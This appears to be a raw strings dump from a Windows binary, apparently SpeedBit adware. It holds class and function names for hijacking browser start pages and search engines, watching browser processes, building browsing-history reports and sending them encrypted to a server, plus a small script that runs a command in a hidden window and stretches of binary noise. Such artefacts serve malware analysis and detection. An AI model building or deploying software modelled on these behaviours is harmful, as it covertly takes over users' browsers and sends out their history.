.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe